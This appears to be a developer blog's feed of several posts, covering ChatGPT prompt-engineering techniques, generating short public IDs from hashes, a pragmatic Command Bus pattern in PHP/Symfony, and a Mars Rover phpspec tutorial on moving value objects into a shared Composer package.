Isn't Zero-Shot prompting just... Prompting? Well X-Shot isn't just about having examples in the prompt, it's mainly about the capability of the model to perform better on new data it wasn't trained on, so we're going to see that "Zero-Shot" term used in conjunction with other techniques.
See also, Kris - All About AI's article: X-Shot Prompting
Few-Shot Chain of Thought prompting allows Large Language Models to perform better on logic based tasks (such as solving arithmetic, commonsense, and symbolic problems) by including in the examples the reasoning steps:
Q: Roger has 5 tennis balls. He buys 2 more cans of tennis balls.
Each can has 3 tennis balls. How many tennis balls does he have now?
A: Roger started with 5 balls. 2 cans of 3 tennis balls each is 6 tennis balls.
5 + 6 = 11. The answer is 11.
Q: The cafeteria had 23 apples. If they use 20 to make lunch and bought 6 more,
how many apples do they have?
Zero-Shot Chain of Thought prompting can also be used to get better results for these tasks, by including in the prompt a request to detail the reasoning steps:
A juggler can juggle 16 balls. Half of the balls are golf balls,
and half of the golf balls are blue. How many blue golf balls are there?
Let's think step by step.
More specifically, ending the prompt with Let's think step by step proved
to provide the best results
(claim backed in the paper CoT Prompting Elicits Reasoning in LLM).
Generated Knowledge prompting allows Large Language Models to perform better on commonsense reasoning by having a first prompt requesting the generation of knowledge on a topic, and then incorporating the output in a second prompt that requests top perform the related commonsense task.
Here's the first prompt asking for knowledge generation:
Write 5 facts about test driven development
Then the second prompt which incorporates the output for the first prompt:
Here are 5 facts about TDD:
1. Test-driven development (TDD) is a software development process that emphasizes the creation of automated tests before any code is written. In TDD, developers write a failing test case first, then write code to pass the test, and then refactor the code to improve it.
2. TDD helps to ensure that the code is working correctly by testing it at every step of the development process. By creating tests first, developers can also ensure that their code meets the requirements and specifications of the project.
3. TDD can be used with a variety of programming languages and frameworks, and it is often used in agile development methodologies. It can also be used in combination with other testing techniques, such as behavior-driven development (BDD) and acceptance test-driven development (ATDD).
4. TDD can result in improved code quality, as developers are forced to think more deeply about the design of their code and the potential edge cases that their code may encounter. TDD can also result in faster development times, as bugs are caught early in the development process and can be fixed before they cause more significant issues.
5. TDD is not a silver bullet solution for software development and may not be suitable for all projects or teams. It can require additional time and effort upfront to write tests and ensure that they are passing, and it may require a cultural shift in the development team to fully adopt the TDD methodology.
With TDD, can I first write code that fails, then write a test and finally refactor the code to make the test pass?
Note: I've seen this as also being referred to as Chain Prompting.
The following prompt engineering techniques are proven by studies to improve the output quality of Large Language Models:
Let's think step by stepAll in all, while I haven't found a practical use case for ChatGPT in my day to day developer activity, it still seems worth exploring its potential for generating content. The quest continues.
]]>In my quest to find a use for ChatGPT in my day to day developer activity, I've stumbled upon this video: ChatGPT Prompt Engineering: How to Write a Story, by Kris - All About AI).
Granted, story writing is a bit irrelevant for what I'm looking for. Yet the way the messages sent to ChatGPT (aka "prompts") were crafted, proved quite interesting!
Let me walk you through it, with some added references so we can learn a thing or two.
After opening a new conversation, the First Prompt (or user message) sent to ChatGPT is used to prime it:
You are a {Genre} author.
Your task is to write {Genre} stories in a vivid and intriguing language.
Answer with "..." if you acknowledge.
Don't write anything yet.
Genre = Sci-Fi
This is a variation of the You are [job], you have been [doing thing] for 20 years prompt,
which helps ChatGPT narrow down the context that it's going to use to generate its replies.
Reference: "Give ChatGPT an identity" section from How To Use ChatGPT: Advanced Prompt Engineering
Interestingly, it uses a placeholder ({Genre}) and sets its value (Genre = Sci-Fi).
It also makes sure that ChatGPT doesn't generate any reply.
Could this be because ChatGPT will base its next replies on any text it will have already generated in the conversation?
The Second Prompt is used to specify more context for chatGPT:
Title: [Insert story title here]
Setting: [Insert setting details here, including time period, location, and any relevant background information]
Protagonist: [Insert protagonist's name, age, and occupation, as well as a brief description of their personality and motivations]
Fill out the template above for a {Genre} story
Genre = Sci-Fi
The brilliance of this one is that it uses a second kind of placeholder ([Insert story title here]),
one that is intended for ChatGPT to replace (Fill out template above).
If ChatGPT is indeed going to base its next reply on whatever it has already generated earlier in the conversation, then having it repeat the instructions with the added details is simply genius.
The list format might also not be trivial,
as I've seen claims that usage of colons (Title: [insert story title here])
is supposed to help ChatGPT be more specific in its replies too.
Reference: "Prompt 2" chapter from Advanced ChatGPT Prompt Tutorial
While the First and Second prompts were about setting the context, the Third and Fourth ones are finally the calls to action.
Here's the Third Prompt:
Build a story outlines from the factors above:
ChatGPT is going to generate an ordered list based on the context previously given.
Then the Fourth Prompt:
Great, now create story chapters from the outlines above:
ChatGPT is going to reuse its reply for the Third Prompt, and expand on it.
I'm taking note of the use of the word Great,
could its purpose be to give some positive feedback to ChatGPT?
Another thing worth mentioning is the use of the word now,
which I see a lot from prompt engineers,
and I'm not sure if it's delibarate to improve ChatGPT replies.
But most importantly,
I'm wondering how from the factors above is intepreted by ChatGPT:
is it going to consider every messages sent in the current conversation,
or is it going to focus on the immediately prior message.
I've personally got a feeling that ChatGPT will focus mainly on its own replies from the conversation.
The usage of a final colon : is especially noteworthy,
I'd be curious to know if this is another hack to help ChatGPT write more focused replies.
The Fifth Prompt is yet another call to action:
Write Chapter 1 in depth and in great detail, in a intriguing writing style:
It asks ChatGPT to reuse its previous reply and expand on it,
but this time only a section of it by referencing the chapter number
(Write Chapter 1)!
The rest of the prompt is a variation of
Write a [length] [content type] on [topic] in the style of [style].
Specifying some constraints such as these helps ChatGPT avoid irrelevant output.
Reference: "Be specific, descriptive and as detailed as possible about the desired context, outcome, length, format, style, etc " section from Best practices for prompt engineering with OpenAI API
In my opinion, the most important piece of advice from that video comes in play when writing the second to tenth chapters:
Write Chapter 2 in depth and in great detail, in a intriguing writing style:
Instead of copying the prompt, pasting it in the input message box, changing the chapter number and then sending it as the Sixth Prompt, the advice we're given is to edit the Fifth Prompt (through ChatGPT's UI), change the number and submit it!
ChatGPT's UI will still allow you to check the previous versions of the prompt, as well as their generated replies, so you don't lose anything here.
But this ties in with the idea that ChatGPT performs better with its immediately prior message, than asking it to expand on a reply it wrote 10 messages earlier.
While the purpose of the video was to write a Sci-Fi story, it helped learn a lot of Prompt Engineering techniques (the art of crafting messages that will improve ChatGPT replies).
The First Prompt needs to prime ChatGPT for the targeted domain, and make sure that it doesn't reply anything:
You're [JOB].
You have been [DOING JOB] for 20 years.
Your task is now to [TASK].
Answer with "..." if you acknowledge.
Don't write anything yet.
It seems to me that ChatGPT bases its reply on its own immediately prior message, so the Second Prompt needs to make ChatGPT repeat it in its reply, to set up the context for the Third Prompt's reply.
The usage of colons (:) helps ChatGPT to be more specific in its replies,
and it's possible to use placeholders that are going to be replaced
with generated content in ChatGPT reply:
Title: [Insert title]
Setting: [Insert setting details here]
Fill out the template above for a Sci-Fi story
If the prompt is intended to be copy pasted and used in different scenarios, it's possible to use placeholders that act as variables, and to which the value is set further down the prompt:
You are a {Genre} author.
Your task is to write {Genre} stories
Genre = Sci-Fi
The Third Prompt is going to be a call to action, that's going to use the Second Prompt's reply for context.
Now, write [length] [content type] on [topic] in the style of [style], using [context] from above:
While we're on the topic of length it's very important to bear in mind that shared between the prompt you write and the reply it generates, ChatGPT can only handle 4000 tokens, which is approximately 3000 words (when it uses the text-davinci-003 model).
So for example, if your prompt contains 3000 tokens, it only leaves ChatGPT with a 1000 token left for its reply!
Reference: "Important: Prompt Size Matters" chapter from This Will Make You Better than 99% ChatGPT Users
The Fourth Prompt is going to be a call to action, that's going to use the Third Prompt's reply for context, and so on.
If for some reason the Fifth Prompt needs to use the Third Prompt's reply for context, then we should instead edit directly the Third Prompt, make the required changes, and submit them.
All in all, while I haven't found a practical use case for ChatGPT in my day to day developer activity, it still seems worth exploring its potential for generating content. The quest continues.
]]>In the later case, an ID needs to be artificially crafted.
Two of the popular strategies is to use either an auto incremental one or a universally unique one, however when it comes to share them publicly, both strategies present some drawbacks
Resources are given a serial number, starting from 1 and increased by 1 for every new entry added.
This means that the ID of the last resource needs to be known in order to create a new one, so that's usually done by the database itself.
Resources are attributed with a 36 characters long hexadecimal string, which is computed by an algorithm.
A couple of Universally Unique ID (UUID) strategies are available, the main ones being:
Since UUIDs are 36 characters long, and auto incremental IDs are incrementally longer, there might be a need for a shorter ID.
The requirements for a short ID are usually:
A possible compromise is to keep the IDs as they currently are in the system for internal operations, and provide a hash of it for public operations, with the hope that the hash is shorter and more readable than the ID.
As of 2018, the best hashing algorithm is SHA-256, as it generates 256 cryptologically secure bits and hasn't been found to be vulnerable to collision attacks yet.
The drawbacks of hashes are the following:
Following the
Birthday Paradox,
we can calculate when the first collision will happen:
after outputting 2 ** (n / 2) hashes
(with n being the number of output bits).
For SHA-256, that's 340 undecillion (340 282 366 920 938 463 463 374 607 431 768 211 456) hashes before a collision happens.
References:
The Git project uses hexadecimal representation of SHA-1 hashes to identify each commits.
Since these hashes are quite lengthy (160 bits, 40 hexadecimal characters), Git allows to use the first few characters to be able to identify it (at first it was the first 7, then it's been changed to the first 12 and finally it's been changed to dynamically increment).
The number of hashes a subset covers can be calculated as follow: 16 ** d
(with d being the number of first hexadecimal characters selected).
Using the Birthday Problem formula,
we can estimate that the first collision might happen after
2 ** (n / 2) short hashes have been used
(with n being the number of first bits, which is d * 4,
with d being the number of first hexadecimal characters).
Here's a handy list:
References:
At the lowest level, IDs are represented as binary numbers.
To be more human friendly, they can then be converted to a different base:
We can even use a custom base, such as base 62 which would use all 26 English alphabet characters, both lower case and upper case, and all 10 digits.
The bigger the base, the shorter the same number will be represented, so a way to shorten an ID (and that includes a way to shorten a hash) is to represent it in a different base.
While using this approach might seem like a good idea at first (human readable IDs that look like words), they actually bring more trouble (chances to generate bad words in many languages).
References:
Regardless of the type of internal ID used (auto incremental, UUID, or other), it could still be benificial to generate from them a short public ID.
A way to do so is to create a SHA-256 hash out of the ID, and then use its first few characters.
The precise number of character to use can be incremental, it should be bumped up when the number of generated hashes becomes close to the estimated first collision.
]]>See also:
TL;DR: Use Command Bus pattern in your controllers, but drop the bus.
The Command Bus pattern relies on 3 types of classes:
The first one is the Command:
SubmitNewQuote, AssignReviewers, etc)Next is the Command Handler:
HandlerAnd Finally there's a Command Bus interface allowing us to build Middlewares:
Middlewares can do any action we want before and/or after the wrapped Command Bus. They can be nested in a specific order, allowing us a fine grained control over how the Command will be handled.
Command Bus can be described as a routing for the domain: a Command (like a Request) is given to the Command Bus (like a Router) which is going to call the appropriate Command Handler (like a Controller).
We can use Command Bus in our controller: create the Command using the Request's inputs, and then take the code that would be in the Controller and move it in the Command Handler.
This way our Domain logic is decoupled from the Framework. The idea of being able to switch an application to a different framework might seem ludicrous (when does that ever happen?), but the truth is that two major versions of a single framework often feel like having two different frameworks (eg symony1 V Symfony2) and in some cases it's even the case for minor versions (eg Symfony 2.0 V Symfony 2.1).
The main point of Command Bus is the possibility to create Middlewares, however the same thing could be achieved with a good old Event Dispatcher, so let's ditch the Bus.
The Routing thing should already be done for us by the framework, and it should be true regardless of the framework or version upgrades. So we can safely inject Command Handlers directly in Controllers.
Finally, most of the time applications aren't asynchronous. So when it's not the case it should be OK for the Command Handler to return a value (eg the created or updated resource).
Let's put all this wisdom into practice by creating a Controller allowing us to submit a code to reset a counter.
First we're going to create the Command, it should contain all the input parameters, do a simple validation on it and have an intention revealing name describing the action we'd like to do:
<?php
// File: src/Dharma/Swan/SubmitCode.php;
namespace Dharma\Swan\Code;
class SubmitCode
{
public $code;
/**
* @throws \DomainException If the required "code" parameter is missing
* @throws \DomainException If the "code" parameter is not a string
*/
public function __construct($code)
{
if (null === $code) {
throw new \DomainException(
'Missing required "code" parameter',
422
);
}
if (!is_string($code)) {
throw new \DomainException(
'Invalid "code" parameter: should be a string',
422
);
}
$this->code = (string) $code;
}
}
Note 1: Command class attributes are set in the constructor, and then read in the Command Handler. Since it's never used anywhere else, there's no point creating a getter or setter for it, we can just make those attributes public.
Note 2: Commands are going to check the parameters type, so there's no need to type hint the constructor arguments (we should allow wrong types so we can throw an exception with a helpful message).
Note 3:
DomainExceptionis the PHP standard exception for application errors (eg not found, forbidden, etc). Here we use the code422which is the HTTP status code forUNPROCESSABLE ENTITY("validation failed"). Our advice is to create custom Application Exceptions that extendDomainExceptionand set the right code (egValidationFailedwith code 422,NotFoundwith code 404, etc).
The second step is to create the Command Handler. It needs to do more complex validation, and the actual logic associated to the Command's intention:
<?php
// File: src/Dharma/Swan/SubmitCodeHandler.php;
namespace Dharma\Swan;
use Dharma\Swan\Service\CheckCode;
use Dharma\Swan\Service\ResetCounter;
class SubmitCodeHandler
{
private $checkCode;
private $resetCounter;
public function __construct(
CheckCode $checkCode,
ResetCounter $resetCounter
) {
$this->checkCode = $checkCode;
$this->resetCounter = $resetCounter;
}
/**
* @throws \DomainException If the "code" parameter is not a valid code
*/
public function handle(SubmitCode $submitCode): int
{
$this->checkCode->check(
$submitCode->code
);
$newCount = $this->resetCounter->reset();
return $newCount;
}
}
Note 4: Services with descriptive names are injected and used in the Command Handler, so that reading the
handlemethods feels like reading the steps of the current use case.Note 5: The
CheckCodeservice will throw a 442 exception if the code is invalid (eg if the code is not4 8 15 16 23 42).Note 6: We've decided for
ResetCounterto return the new count. For an asynchronous application, it wouldn't return anything, neither would the Command Handler.
Finally we can use the Command and Command Handler in our Controller:
<?php
// File: src/Dharma/Swan/Controller/SubmitCodeController.php;
namespace Dharma\Swan\Controller;
use Dharma\Swan\SubmitCode;
use Dharma\Swan\SubmitCodeHandler;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\Request;
class SubmitCodeController
{
private $submitCodeHandler;
public function __construct(SubmitCodeHandler $submitCodeHandler)
{
$this->submitCodeHandler = $submitCodeHandler;
}
/**
* @throws \DomainException If the required "code" parameter is missing
* @throws \DomainException If the "code" parameter is not a string
* @throws \DomainException If the "code" parameter is not a valid code
*/
public function submitCode(Request $request): Response
{
$newCount = $this->submitCodeHandler->handle(new SubmitCode(
$request->request->get('code')
));
return new Response(json_encode(['counter' => $newCount]), 200, [
'Content-Type' => 'application/json',
]);
}
}
Note 7: Exceptions should be handled by event listeners, those should log important errors and create an appropriate response.
Note 8: Some controllers have more than one action meaning they'd be injected with more than one Command Handler, however only one will be called per Request. Since Symfony 3.3 Service Locators can be injected so that the controller can only access the listed Command Handlers, and only one Command Handler will actually be instantiated. Before Symfony 3.3, the Container should be injected (same effect, but all services are accessible).
Command Bus allows us to decouple our application logic from the framework, protecting us from Backward Compability Breaking changes.
However since the Bus can be replaced by Event Listeners, we can simply drop it and inject the Command Handlers directly in Controllers. If our application isn't asynchronous, then Command Handlers should be able to return values.
So our PragmatiClean Command Bus is simply a Command and Command Handler pair for each Use Case in our application (so one pair per Controller action).
]]>For more resources one the Command Bus design pattern, check these links:
- CommandBus by Shawn McCool
- What am I missing with this whole command bus (reddit question)
- A wave of command buses (series) by Matthias Noback
- Avoid the Mud (slides) by Richard Miller
- Messaging Flavours and Form, Command, Model validation and also Functional Foundation for CQRS/ES by Mathias Verraes
- Tactician, a simple Command Bus library for PHP
- Clarified CQRS by Udi Dahan
Also here are some usage examples, with code and everything:
- Mars Rover: an application coded chapter after chapter, using this design pattern
- The Ultimate Developer Guide to Symfony Examples on how to create an API endpoint, a full stack web page and a console command with Symfony and this design pattern
In this new series we'll see how to stop wasting time arguing which one is best and start using both instead.
Clean Code is about writing for the long term, usually by structuring it with the help of Design Patterns and Principles.
The assumption is that everything will change given enough time, be it code or people, and so things should be easy to understand and easy to change.
The opposite of Clean Code would be "taking shortcuts" to get the job done, which causes maintenance to become harder and harder over time.
Pragmatic Code is about writing for the short term, usually by selecting the most simple and quickest way to achieve a task.
The assumption is that things need to be done as quickly as possible, and the simplest solution is always the best.
The opposite of Pragmatic Code would be "over engineering" for the sake of it, which wastes time, makes the code harder to maintain and also makes it less efficient.
As we can see both school seem diametrically opposed, hence the heated debates.
But both seem to be making good points, so why not try to adopt both?
Pragmatic Programmers don't resent structured code or even Design Patterns and Principles, what they find aberrant is the over use of them and their misuse.
Clean Coders don't dislike simple solutions and they don't like spending more time on a task than necessary, what they find abnormal is code that has become too hard to maintain because it grew more and more out of control over time.
So let's develop one universal school of thought that covers both: PragmatiClean. We'll do so by going over the following Design Patterns/Principles and give them a twist:
And to make all this learning applicable, we'll show some Symfony code!
]]>TL;DR: Links I tweeted during 2016
Last year my interests seemed to have been split in three periods:
I've also discovered two inspiring talks, I highly recommend you to watch them:
Apart from that, tons of links, as usual.
Because PHP 7 will no wait faster for your database/remote/filesystem calls:
We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now developing the last one, requesting its location:
Mars rover will be requested to give its current location (
xandycoordinates and the orientation).
In this article we're going to move geolocation value objects (Location,
Coordinates and Orientation) into their new package (geolocation):
git checkout 5-location
cd packages/geolocation
Let's move our value objects to their new package:
mkdir -p src/MarsRover/Geolocation spec/MarsRover/Geolocation
mv ../navigation/src/MarsRover/Navigation/{Coordinates,Location,Orientation}.php ./src/MarsRover/Geolocation/
mv ../navigation/spec/MarsRover/Navigation/{Coordinates,Location,Orientation}Spec.php ./spec/MarsRover/Geolocation/
We then need to fix the namespace:
sed -i 's/Navigation/Geolocation/' */MarsRover/Geolocation/*.php
This should allow us to run successfully our tests for this package:
vendor/bin/phpspec run
All Green!
Now let's update the navigation package:
cd ../navigation
In order to find where our Location class is used, we can use the following:
grep -R Location src spec/
We need to fix the use statement in spec/MarsRover/Navigation/LandRoverSpec.php:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Geolocation\Location;
use MarsRover\Geolocation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
function it_has_location()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$location = $this->getLocation();
$location->shouldHaveType(Location::class);
$coordinates = $location->getCoordinates();
$coordinates->getX()->shouldBe(self::X);
$coordinates->getY()->shouldBe(self::Y);
$location->getOrientation()->get()->shouldBe(self::ORIENTATION);
}
}
We can see that we also use Orientation, so we fix it here and we'lldo a search later.
Then we need to add use statements in src/MarsRover/Navigation/LandRover.php:
<?php
namespace MarsRover\Navigation;
use MarsRover\Geolocation\{
Coordinates,
Location,
Orientation
};
class LandRover
{
private $location;
public function __construct($x, $y, $orientation)
{
$this->location = new Location(
new Coordinates($x, $y),
new Orientation($orientation)
);
}
public function getLocation() : Location
{
return $this->location;
}
}
We also spot a use of Coordinates, so we fix it here now and we'll do a search later.
All done. Let's search for Coordinates:
grep -R Coordinates src spec
There's nothing we haven't fixed yet, so let's search for Orientation:
grep -R Orientation src spec
It looks like spec/MarsRover/Navigation/LandRoverHandlerSpec.php uses it, so let's fix it:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\EventSourcing\AnEventHappened;
use MarsRover\EventSourcing\Event;
use MarsRover\Navigation\Events;
use MarsRover\EventSourcing\EventStore;
use MarsRover\Navigation\LandRover;
use MarsRover\Geolocation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
const EVENT_NAME = Events::ROVER_LANDED;
const EVENT_DATA = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_lands_a_rover_at_given_location(
AnEventHappened $anEventHappened,
Event $roverLanded,
EventStore $eventStore
) {
$this->beConstructedwith($anEventHappened, $eventStore);
$landRover = new LandRover(
self::X,
self::Y,
self::ORIENTATION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverLanded);
$eventStore->log($roverLanded)->shouldBeCalled();
$this->handle($landRover);
}
}
That should be it for our navigation package. Let's run the tests:
vendor/bin/phpspec run
All Green!
Finally we can use our value objects in our location package:
cd ../location
We can now use Orientation for our constant in spec/MarsRover/Location/LocateRoverHandlerSpec.php,
and also make sure both FindLatestLocation and LocateRoverHandler return a Location
value object:
<?php
namespace spec\MarsRover\Location;
use MarsRover\Geolocation\Coordinates;
use MarsRover\Geolocation\Location;
use MarsRover\Geolocation\Orientation;
use MarsRover\Location\Service\FindLatestLocation;
use PhpSpec\ObjectBehavior;
class LocateRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
const LOCATION = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_finds_a_rover_latest_location(
FindLatestLocation $findLatestLocation
) {
$this->beConstructedWith($findLatestLocation);
$location = new Location(
new Coordinates(self::X, self::Y),
new Orientation(self::ORIENTATION)
);
$findLatestLocation->find()->willReturn($location);
$this->handle()->shouldBe($location);
}
}
Let's update src/MarsRover/Location/Service/FindLatestLocation.php to add the return type:
<?php
namespace MarsRover\Location\Service;
use MarsRover\Geolocation\Location;
interface FindLatestLocation
{
public function find() : Location;
}
And finally let's update src/MarsRover/Location/LocateRoverHandler.php:
<?php
namespace MarsRover\Location;
use MarsRover\Geolocation\Location;
use MarsRover\Location\Service\FindLatestLocation;
class LocateRoverHandler
{
private $findLatestLocation;
public function __construct(FindLatestLocation $findLatestLocation)
{
$this->findLatestLocation = $findLatestLocation;
}
public function handle() : Location
{
return $this->findLatestLocation->find();
}
}
Now tests should pass:
vendor/bin/phpspec run
All green! Let's check all tests across our project:
cd ../../
vendor/bin/phpspec run
Super green! We can now commit our work:
git add -A
git commit -m 'Moved geolocation value objects in their package'
git checkout master
git merge --no-ff 5-location
And that's it! We now have a fully functional Mars Rover, that covers the following use cases:
- Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
xandy, which are both integers) and an orientation (a string being one ofnorth,east,westorsouth).- Once a rover has been landed on Mars it is possible to drive them, using instructions such as:
move_forward(keeps orientation, but moves along thexoryaxis)turn_left/turn_right(keeps the same coordinates, but changes the orientation).- Mars rover will be requested to give its current location (
xandycoordinates and the orientation).
In order to follow the CQRS principle, we've decided to separate our code in two main packages:
navigation: write logiclocation: read logicWith this we can imagine deploying navigation on a central, restricted in
access server, and deploy many location servers, all synchronized with the
data received in navigation.
Splitting our code into many packages would have been quite bothersome without Mono Repo: all our packages are versioned in the same git repository and can be linked together using Composer.
For each use case, we've structured our code as follow:
With Event Sourcing, the "actual work" for "write" use cases is simply creating an event and store it. For the "read" use cases it could be retrieving the latests state by replaying all the past events in the store, or simply retrieving the latest state from a cache.
And last but not least, we've written tests before writing the actual code, which helped us to think about how the code will be used. Our test method names were written as if they were sentences, which has the consequence to make our test a descriptive and accurate documentation. And of course our tests make sure we don't introduce regressions.
I hope this series has helped to introduce you to those concepts.
]]>We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now developing the last one, requesting its location:
Mars rover will be requested to give its current location (
xandycoordinates and the orientation).
In this article we're going to create a new package for the geolocation value
objects (Location, Coordinates and Orientation).
geolocation packageWe can start by creating the directory:
git checkout 5-location
mkdir -p packages/geolocation
cd packages/geolocation
Composer needs us to set up the package by creating a composer.json file:
{
"name": "mars-rover/geolocation",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Geolocation",
"autoload": {
"psr-4": { "MarsRover\\Geolocation\\": "src/MarsRover/Geolocation" }
},
"require": {
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
We've decided to use phpspec as a test framework, and
to get the most of it we'd like to use its SpecGen
extension. To do so we need to create the phpspec.yml.dist file:
extensions:
Memio\SpecGen\MemioSpecGenExtension: ~
Note: For more information about phpspec see this article.
Finally, we can configure this package's git by creating a .gitignore file:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
/composer.lock
With this we've finished creating our package. We can run Composer:
composer install --optimize-autoloader
That should be enough for a first commit:
git add -A
git commit -m '5: Created Geolocation package'
geolocation to the projectLet's go back to the project's root:
cd ../../
All we need to do is to add a new line in the require section of our
composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"repositories": [
{
"type": "path",
"url": "./packages/*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"mars-rover/geolocation": "*@dev",
"mars-rover/location": "*@dev",
"mars-rover/navigation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"phpspec/phpspec": "^3.0"
}
}
Actually, we also need to add a new section in phpspec.yml.dist:
suites:
event-sourcing:
namespace: 'MarsRover\EventSourcing'
src_path: packages/event-sourcing/src
spec_path: packages/event-sourcing
geolocation:
namespace: 'MarsRover\Geolocation'
src_path: packages/geolocation/src
spec_path: packages/geolocation
location:
namespace: 'MarsRover\Location'
src_path: packages/location/src
spec_path: packages/location
navigation:
namespace: 'MarsRover\Navigation'
src_path: packages/navigation/src
spec_path: packages/navigation
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a second commit:
git add -A
git commit -m '5: Added geolocation package to main project'
geolocation to navigationNow let's go to the navigation package:
cd packages/navigation
All we need to do is to add a new line in the require section of our
composer.json file:
{
"name": "mars-rover/navigation",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Navigation",
"autoload": {
"psr-4": { "MarsRover\\Navigation\\": "src/MarsRover/Navigation" }
},
"repositories": [
{
"type": "path",
"url": "../*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"mars-rover/geolocation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a third commit:
git add -A
git commit -m '5: Added geolocation package to navigation package'
geolocation to locationNow let's go to the location package:
cd ../location
This time, in addition to a new line in the require section we also need to
add a new repositories section to our composer.json file:
{
"name": "mars-rover/location",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Location",
"autoload": {
"psr-4": { "MarsRover\\Location\\": "src/MarsRover/Location" }
},
"repositories": [
{
"type": "path",
"url": "../*"
}
],
"require": {
"mars-rover/geolocation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a fourth and last commit:
git add -A
git commit -m '5: Added geolocation package to location package'
We've now created a geolocation package that is shared between navigation
and location, keeping them both separate.
In the next article, we'll start moving our value objects to our new package.
]]>We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now developing the last one, requesting its location:
Mars rover will be requested to give its current location (
xandycoordinates and the orientation).
In this article we're going to create the locating logic:
git checkout 5-location
Our LocateRover command object relies on a FindLatestLocation service. They
both currently return an array containing the coordinates and orientation of
our rover. Since FindLatestLocation is an interface, we can't control what's
being actually returned... This could be fixed by specifying a Location
object as a return type, and it would make things more explicit.
Since Our Location object will contain Coordinates and Orientation, we
might want to create it in the navigation packages, where those two other
objects are alreay:
cd packages/navigation
We can now start writing Location's test:
vendor/bin/phpspec describe 'MarsRover\Navigation\Location'
This should have bootstrapped the following
spec/MarsRover/Navigation/LocationSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Location;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class LocationSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(Location::class);
}
}
We can then edit it to specify that it should contain Coordinates and
Orientation:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Coordinates;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LocationSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
function it_has_coordinates()
{
$coordinates = new Coordinates(self::X, self::Y);
$orientation = new Orientation(self::ORIENTATION);
$this->beConstructedWith($coordinates, $orientation);
$this->getCoordinates()->shouldBe($coordinates);
}
function it_has_orientation()
{
$coordinates = new Coordinates(self::X, self::Y);
$orientation = new Orientation(self::ORIENTATION);
$this->beConstructedWith($coordinates, $orientation);
$this->getOrientation()->shouldBe($orientation);
}
}
That sounds simple enough, we can run the tests:
vendor/bin/phpspec run
And of course they fail because Location doesn't exist yet. to help us write
it, phpspec bootstrapped the following src/MarsRover/Navigation/Location.php
file:
<?php
namespace MarsRover\Navigation;
class Location
{
private $coordinates;
private $orientation;
public function __construct(Coordinates $coordinates, Orientation $orientation)
{
$this->coordinates = $coordinates;
$this->orientation = $orientation;
}
public function getCoordinates()
{
}
public function getOrientation()
{
}
}
Let's complete it:
<?php
namespace MarsRover\Navigation;
class Location
{
private $coordinates;
private $orientation;
public function __construct(
Coordinates $coordinates,
Orientation $orientation
) {
$this->coordinates = $coordinates;
$this->orientation = $orientation;
}
public function getCoordinates() : Coordinates
{
return $this->coordinates;
}
public function getOrientation() : Orientation
{
return $this->orientation;
}
}
This should be enough to make our tests pass:
vendor/bin/phpspec run
All green! We can now commit our work:
git add -A
git commit -m '5: Created Location'
This Location value object looks great! Why didn't we create it in the first
place? That'll be pragmatism for you: don't create something you might need in
the future, create something you need now. But now that's it's here, we can
refactor LocateRover to use it.
First let's update its test:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Location;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
function it_has_location()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$location = $this->getLocation();
$location->shouldHaveType(Location::class);
$coordinates = $location->getCoordinates();
$coordinates->getX()->shouldBe(self::X);
$coordinates->getY()->shouldBe(self::Y);
$location->getOrientation()->get()->shouldBe(self::ORIENTATION);
}
}
Then its code:
<?php
namespace MarsRover\Navigation;
class LandRover
{
private $location;
public function __construct($x, $y, $orientation)
{
$this->location = new Location(
new Coordinates($x, $y),
new Orientation($orientation)
);
}
public function getLocation() : Location
{
return $this->location;
}
}
And finally LandRoverHandler:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\{
AnEventHappened,
EventStore
};
class LandRoverHandler
{
private $anEventHappened;
